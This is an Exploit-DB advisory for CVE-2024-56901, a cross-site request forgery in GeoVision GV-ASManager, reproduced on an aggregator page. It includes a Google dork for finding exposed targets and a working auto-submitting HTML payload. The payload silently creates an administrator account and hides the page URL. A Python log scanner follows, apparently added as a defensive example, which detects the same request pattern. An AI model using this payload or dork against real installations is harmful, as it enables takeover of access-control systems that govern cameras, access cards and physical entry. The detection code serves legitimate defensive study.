GeoVision GV-ASManager 6.1.1.0 - CSRF

šŸ—“ļøĀ 11 Apr 2025Ā 00:00:00Reported byĀ Giorgi DograshviliTypeĀ 
exploitdb
Ā exploitdb
šŸ”—Ā www.exploit-db.comšŸ‘Ā 272Ā Views

CSRF vulnerability in GeoVision GV-ASManager 6.1.1.0 allows arbitrary Admin account creation via GET request.

Related

Reporter | Title | Published | Views
Circl | CVE-2024-56901 | 2 Feb 2025 22:00 | –
Circl | CVE-2024-56903 | 2 Feb 2025 22:00 | –
CNNVD | Geovision GV-ASWeb security vulnerability | 3 Feb 2025 00:00 | –
CNNVD | Geovision GV-ASWeb security vulnerability | 3 Feb 2025 00:00 | –
CVE | CVE-2024-56901 | 3 Feb 2025 00:00 | –
CVE | CVE-2024-56903 | 3 Feb 2025 00:00 | –
Cvelist | CVE-2024-56901 | 3 Feb 2025 00:00 | –
Cvelist | CVE-2024-56903 | 3 Feb 2025 00:00 | –
EUVD | EUVD-2024-53445 | 3 Oct 2025 20:07 | –
EUVD | EUVD-2024-53447 | 3 Oct 2025 20:07 | –
# Exploit Title: GeoVision GV-ASManager 6.1.1.0 - CSRF 
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.1.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56901
# PoC: https://github.com/DRAGOWN/CVE-2024-56901

A Cross-Site Request Forgery (CSRF) vulnerability in the Geovision GV-ASManager web application, version 6.1.1.0 or earlier, allows attackers to arbitrarily create Admin accounts via a crafted GET request. This vulnerability is chained with CVE-2024-56903 for a successful CSRF attack.

Requirements
To perform a successful attack, an attacker requires:
- GeoVision ASManager version 6.1.1.0 or earlier
- Network access to the GV-ASManager web application (in some cases the application is publicly accessible)
- An administrator's interaction while a session is open in the browser

Impact
The vulnerability can be leveraged to perform the following unauthorized actions:
An unauthorized user is able to:
- Convert the POST request into a GET request by leveraging the CVE-2024-56903 vulnerability.
- Craft a malicious HTML page that makes changes in the application on behalf of the administrator account.
- Create a new administrator account on behalf of the legitimate administrator account.
After a successful attack, an attacker will be able to:
- Access resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
- Make changes to data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras and access controls.
- Clone and duplicate access control data for further attack scenarios.
- Perform the CVE-2024-56902 attack to retrieve cleartext passwords that can be reused against other digital assets of the organization.


The CSRF code:

<html>
  <body>
    <!-- Set the target; the form has no method attribute, so it submits via GET -->
    <form action="https://[TARGET]/ASWeb/bin/ASWebCommon.srf">
      <input type="hidden" name="action" value="UA&#95;SetCreateAccount" />
      <input type="hidden" name="id" value="Malicious" />                            <!-- Set username -->
      <input type="hidden" name="password" value="Youarecracked999&#33;" />          <!-- Set password -->
      <input type="hidden" name="email" value="Malicious&#64;geovision&#46;com&#46;tw" /> <!-- Set email -->
      <input type="hidden" name="level" value="2" />                                 <!-- Set privilege: 1 = Normal user, 2 = Administrator -->
      <input type="submit" value="Submit request" />
    </form>
    <script>
      <!-- Hide the page URL in history, then auto-submit the form -->
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
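As an added defensive example (not part of the original advisory or of the vendor's software), the following Python script scans constructed web-server log lines for the request pattern described above: a state-changing ASWebCommon.srf action arriving via GET, or arriving without a same-site Referer. The simplified log layout, the application hostname and the read-only action name UA_ExampleQuery are assumptions.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (simplified W3C-style layout, an assumption:
# date time method uri-stem params client-ip referer status). The params field is
# assumed to hold the request parameters as the application logged them.
# UA_ExampleQuery is a hypothetical read-only action; UA_SetCreateAccount is the
# account-creation action from the advisory.
SAMPLE_LOG = """\
2025-02-02 10:14:58 GET /ASWeb/bin/ASWebCommon.srf action=UA_ExampleQuery 10.0.0.5 https://asmanager.corp.example/ASWeb/ 200
2025-02-02 10:15:01 GET /ASWeb/bin/ASWebCommon.srf action=UA_SetCreateAccount&id=Malicious&password=x&email=m%40example.com&level=2 10.0.0.5 https://attacker.example/ 200
2025-02-02 10:15:07 POST /ASWeb/bin/ASWebCommon.srf action=UA_SetCreateAccount&id=newadmin&level=2 10.0.0.5 https://asmanager.corp.example/ASWeb/UserAccount 200
2025-02-02 10:15:09 POST /ASWeb/bin/ASWebCommon.srf action=UA_SetCreateAccount&id=backdoor&level=2 10.0.0.5 - 200
"""

# Actions that change state and therefore must never be accepted over GET.
STATE_CHANGING = {"UA_SetCreateAccount"}


def parse_line(line):
    date, time, method, stem, params, client, referer, status = line.split()
    return {"ts": f"{date} {time}", "method": method, "stem": stem,
            "params": {k: v[0] for k, v in parse_qs(params).items()},
            "client": client, "referer": referer, "status": int(status)}


def referer_host(referer):
    # "-" is the conventional placeholder for a missing Referer header.
    return urlsplit(referer).hostname if referer != "-" else None


def flag_csrf_account_creation(log_text, app_host):
    """Return (timestamp, account id, reasons) for suspicious account-creation requests."""
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if not rec["stem"].endswith("/ASWeb/bin/ASWebCommon.srf"):
            continue
        if rec["params"].get("action") not in STATE_CHANGING or rec["status"] != 200:
            continue
        reasons = []
        if rec["method"] == "GET":
            reasons.append("state-changing action via GET (CVE-2024-56903 method downgrade)")
        host = referer_host(rec["referer"])
        if host is None:
            reasons.append("no Referer on state-changing request")
        elif host != app_host:
            reasons.append(f"cross-site Referer {host}")
        if reasons:
            findings.append((rec["ts"], rec["params"].get("id", "?"), "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for ts, account, why in flag_csrf_account_creation(SAMPLE_LOG, "asmanager.corp.example"):
        print(f"{ts} account={account}: {why}")
```

The same two checks (reject state-changing actions over GET; require a same-site Origin/Referer or an anti-CSRF token) are what the application itself should enforce server-side.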


After a successful attack, you will get access to:
- ASWeb - Access & Security Management
- TAWeb - Time and Attendance Management
- VMWeb - Visitor Management
- ASManager - Access & Security Management software in the OS


11 Apr 2025 00:00 Current
8.8 High risk
Vulners AI Score: 8.8
CVSS 3.1: 8.8
EPSS: 0.00666
SSVC
272 Views